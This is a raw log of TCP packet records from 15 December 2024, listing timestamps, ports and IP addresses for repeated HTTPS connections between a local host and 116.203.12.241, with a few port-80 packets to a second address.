Dec 15, 2024 20:47:56.030725956 CET	443	49768	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:56.030782938 CET	49768	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:56.030814886 CET	443	49768	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:56.030837059 CET	49768	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:56.030848026 CET	443	49768	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:56.030920029 CET	49768	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:56.030962944 CET	443	49768	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:56.030977964 CET	49768	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:56.030991077 CET	443	49768	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:56.031095028 CET	49768	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:56.031142950 CET	49768	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:56.031142950 CET	49768	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:56.031171083 CET	443	49768	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:56.031227112 CET	443	49768	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:56.031290054 CET	49768	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:56.031317949 CET	49768	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:56.031317949 CET	49768	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:56.031472921 CET	443	49768	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:56.031507015 CET	443	49768	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:56.031548023 CET	49768	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:56.031618118 CET	49768	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:56.031642914 CET	443	49768	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:56.031672955 CET	443	49768	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:56.336056948 CET	443	49769	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:56.336302042 CET	49769	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:56.336621046 CET	49769	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:56.336633921 CET	443	49769	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:56.338373899 CET	49769	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:56.338380098 CET	443	49769	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:57.413949966 CET	443	49769	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:57.414028883 CET	443	49769	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:57.414150953 CET	49769	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:57.414151907 CET	49769	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:57.415071011 CET	49769	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:57.415137053 CET	443	49769	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:57.835037947 CET	443	49768	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:57.835217953 CET	443	49768	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:57.835391045 CET	49768	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:57.836186886 CET	49768	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:57.836232901 CET	443	49768	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:57.915827036 CET	49771	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:57.915916920 CET	443	49771	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:57.916013956 CET	49771	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:57.916209936 CET	49771	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:57.916248083 CET	443	49771	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:58.946541071 CET	49773	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:58.946595907 CET	443	49773	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:58.946686983 CET	49773	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:58.946877003 CET	49773	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:58.946893930 CET	443	49773	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:59.384885073 CET	443	49771	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:59.387253046 CET	49771	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:59.387753963 CET	49771	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:59.387782097 CET	443	49771	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:59.389276028 CET	49771	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:59.389285088 CET	443	49771	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:59.389367104 CET	49771	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:59.389384985 CET	443	49771	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:59.389391899 CET	49771	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:59.389396906 CET	443	49771	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:59.389475107 CET	49771	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:59.389504910 CET	443	49771	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:59.389513969 CET	49771	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:59.389520884 CET	443	49771	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:59.389626026 CET	49771	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:59.389658928 CET	49771	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:59.389694929 CET	49771	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:59.389868975 CET	443	49771	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:59.389990091 CET	49771	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:59.390017033 CET	443	49771	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:59.390041113 CET	49771	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:59.390055895 CET	443	49771	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:59.390069008 CET	49771	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:59.390078068 CET	443	49771	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:59.390100002 CET	49771	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:59.390115023 CET	443	49771	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:59.390125990 CET	49771	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:59.390173912 CET	443	49771	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:00.567991972 CET	443	49773	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:00.568233013 CET	49773	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:00.568670988 CET	49773	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:00.568698883 CET	443	49773	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:00.570261955 CET	49773	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:00.570274115 CET	443	49773	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:00.570324898 CET	49773	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:00.570343971 CET	443	49773	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:00.570367098 CET	49773	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:00.570379019 CET	443	49773	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:00.570446014 CET	49773	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:00.570480108 CET	443	49773	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:00.570466995 CET	49773	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:00.570511103 CET	443	49773	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:00.570579052 CET	49773	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:00.570669889 CET	443	49773	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:01.330929041 CET	443	49771	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:01.331098080 CET	49771	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:01.331105947 CET	443	49771	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:01.331172943 CET	49771	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:01.332189083 CET	49771	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:01.332254887 CET	443	49771	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:01.993602037 CET	49779	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:01.993691921 CET	443	49779	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:01.993771076 CET	49779	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:01.993979931 CET	49779	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:01.994014025 CET	443	49779	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:02.113735914 CET	443	49773	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:02.113810062 CET	49773	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:02.113856077 CET	443	49773	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:02.113902092 CET	49773	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:02.113912106 CET	443	49773	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:02.113972902 CET	49773	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:02.114589930 CET	49773	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:02.114633083 CET	443	49773	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:03.062009096 CET	49785	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:03.062041044 CET	443	49785	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:03.062205076 CET	49785	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:03.062313080 CET	49785	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:03.062324047 CET	443	49785	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:03.424760103 CET	443	49779	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:03.424846888 CET	49779	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:03.425257921 CET	49779	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:03.425278902 CET	443	49779	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:03.427145004 CET	49779	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:03.427158117 CET	443	49779	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:03.427217007 CET	49779	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:03.427239895 CET	443	49779	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:03.427253962 CET	49779	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:03.427264929 CET	443	49779	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:03.427290916 CET	49779	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:03.427304029 CET	443	49779	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:03.427369118 CET	49779	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:03.427392006 CET	443	49779	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:03.427428961 CET	49779	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:03.427447081 CET	443	49779	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:03.427499056 CET	49779	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:03.427499056 CET	49779	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:03.427525043 CET	443	49779	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:03.427548885 CET	443	49779	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:03.427582026 CET	49779	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:03.427639961 CET	49779	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:03.427669048 CET	49779	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:03.427675009 CET	443	49779	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:03.427706957 CET	443	49779	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:03.427783966 CET	49779	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:03.427812099 CET	443	49779	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:03.427913904 CET	49779	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:03.427932978 CET	443	49779	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:03.427953959 CET	49779	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:03.427990913 CET	443	49779	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:04.475239038 CET	443	49785	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:04.475368023 CET	49785	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:04.475811958 CET	49785	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:04.475821972 CET	443	49785	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:04.477179050 CET	49785	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:04.477184057 CET	443	49785	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:04.477247000 CET	49785	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:04.477262974 CET	443	49785	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:04.477272034 CET	49785	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:04.477274895 CET	443	49785	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:04.477350950 CET	49785	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:04.477370024 CET	443	49785	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:04.477381945 CET	49785	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:04.477391005 CET	443	49785	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:04.477401018 CET	49785	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:04.477411985 CET	443	49785	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:04.477682114 CET	49785	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:04.477793932 CET	443	49785	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:04.478240013 CET	49785	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:04.478269100 CET	443	49785	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:04.478291988 CET	49785	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:04.478310108 CET	443	49785	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:04.478421926 CET	49785	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:04.478445053 CET	443	49785	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:04.478461027 CET	49785	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:04.478468895 CET	443	49785	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:04.478492975 CET	49785	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:04.478509903 CET	443	49785	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:04.478581905 CET	49785	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:04.478596926 CET	443	49785	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:04.478607893 CET	49785	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:04.478617907 CET	443	49785	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:04.478627920 CET	49785	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:04.478652954 CET	443	49785	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:04.478714943 CET	49785	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:04.478734016 CET	443	49785	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:04.478802919 CET	49785	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:04.478866100 CET	49785	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:04.478903055 CET	443	49785	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:04.478920937 CET	49785	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:04.478955030 CET	49785	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:04.479031086 CET	49785	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:04.479091883 CET	49785	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:04.479144096 CET	49785	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:04.523327112 CET	443	49785	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:04.523742914 CET	49785	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:04.523773909 CET	49785	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:04.567370892 CET	443	49785	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:05.240427017 CET	443	49779	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:05.240535975 CET	49779	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:05.240556955 CET	443	49779	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:05.240612030 CET	49779	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:05.240613937 CET	443	49779	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:05.240669012 CET	49779	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:05.241894960 CET	49779	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:05.241906881 CET	443	49779	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:06.118645906 CET	49791	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:06.118690014 CET	443	49791	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:06.118969917 CET	49791	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:06.119023085 CET	49791	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:06.119038105 CET	443	49791	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:06.676457882 CET	443	49785	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:06.676628113 CET	443	49785	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:06.676640987 CET	49785	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:06.676687002 CET	49785	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:06.677467108 CET	49785	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:06.677480936 CET	443	49785	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:07.247174025 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:07.247260094 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:07.247368097 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:07.247576952 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:07.247613907 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:07.610326052 CET	443	49791	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:07.610662937 CET	49791	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:07.611332893 CET	49791	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:07.611360073 CET	443	49791	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:07.612762928 CET	49791	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:07.612763882 CET	49791	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:07.612790108 CET	443	49791	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:07.612829924 CET	443	49791	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:07.612946987 CET	49791	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:07.612946987 CET	49791	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:07.612976074 CET	443	49791	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:07.612998962 CET	443	49791	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:07.613039970 CET	49791	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:07.613051891 CET	443	49791	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:07.613162041 CET	49791	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:07.613339901 CET	443	49791	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:07.613500118 CET	49791	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:07.613585949 CET	443	49791	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:07.613627911 CET	443	49791	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:07.613702059 CET	49791	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:07.613728046 CET	49791	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:07.613765001 CET	443	49791	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:07.613873959 CET	443	49791	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:08.667568922 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:08.667654037 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.672015905 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.672032118 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:08.673827887 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.673837900 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:08.673891068 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.673908949 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:08.673916101 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.673922062 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:08.673949003 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.673964024 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:08.674031973 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.674062014 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:08.674087048 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.674112082 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:08.674144983 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.674165964 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:08.674196959 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.674212933 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.674237013 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.674274921 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.674309969 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:08.674457073 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.674484968 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:08.674501896 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.674530029 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:08.674535036 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.674552917 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:08.674607038 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.674619913 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:08.674638987 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.674650908 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.674685955 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.674696922 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:08.674710035 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.674732924 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:08.674838066 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:08.674887896 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.674915075 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.674940109 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.674964905 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.674977064 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:08.674984932 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.674999952 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.675009012 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.675017118 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:08.675028086 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.675044060 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.675062895 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.675072908 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.675095081 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.675134897 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:08.675146103 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.675163031 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.675182104 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.675247908 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.675277948 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.675290108 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:08.675348997 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.675350904 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:08.675371885 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.675411940 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.675468922 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:08.675575018 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.675590038 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:08.675645113 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.675682068 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.675709009 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.675750017 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.719330072 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:08.719770908 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.763339043 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:08.920063019 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:08.920228004 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.920275927 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:08.920413971 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:08.959738016 CET	49724	80	192.168.2.4	2.20.68.201
Dec 15, 2024 20:48:08.963355064 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:08.963624001 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.011370897 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.041435003 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.041579962 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.041598082 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.041687012 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.041723967 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.041757107 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.041784048 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.041877985 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.079936028 CET	80	49724	2.20.68.201	192.168.2.4
Dec 15, 2024 20:48:09.080077887 CET	49724	80	192.168.2.4	2.20.68.201
Dec 15, 2024 20:48:09.083349943 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.162378073 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.162533998 CET	49797	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:48:09.162616968 CET	443	49797	116.203.12.241	192.168.2.4
Dec 15, 2024 20:48:09.162741899 CET	49797	443	192.168.2.4	116.203.12.241
